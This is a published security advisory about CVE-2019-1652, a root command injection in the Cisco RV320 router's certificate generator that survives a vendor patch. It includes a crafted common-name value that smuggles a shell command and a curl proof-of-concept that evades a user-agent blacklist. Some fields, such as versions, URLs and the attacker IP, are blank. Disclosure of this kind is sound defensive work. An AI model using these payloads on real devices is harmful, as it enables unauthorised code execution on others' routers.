Cisco RV320 Command Injection Vulnerability

ID 1337DAY-ID-32437
Type zdt
Reporter RedTeam
Modified 2019-03-27T00:00:00


Command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router which was inadequately patched by the vendor.

                                            Cisco RV320 Command Injection Vulnerability

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: through
Fixed Versions: none
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL:
Vendor Status: working on patch
Advisory URL:
Advisory Status: published
CVE: CVE-2019-1652


"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details

The router's web interface enables users to generate new X.509
certificates directly on the device. Previously, RedTeam Pentesting
identified a vulnerability (rt-sa-2018-004) [2] in this component. By
providing a specially crafted common name, it was possible to inject
shell commands which were subsequently executed on the router as the
root user. This vulnerability was adressed in firmware version
published by Cisco [3].

RedTeam Pentesting discovered that the certificate generator in the patched
firmware is still vulnerable. The update adds several filters to handle
single quotes in user input. However, these filters can be evaded by
specially crafted inputs. By providing the following string for the
certificate's common name, a "ping" command can be injected:

'a$(ping -c 4'b

Proof of Concept

The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface. The user agent "curl" is
blacklisted by the firmware and must be adjusted in the HTTP client.

$ curl -s -k -A kurl -X POST -b "$COOKIE" \
--data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"SelectSubject_s=1" \
--data-urlencode "common_name='a\$(ping -c 4'b" \

Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at


Prevent untrusted users from using the router's web interface.



Security Risk

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.

# [2019-03-30]  #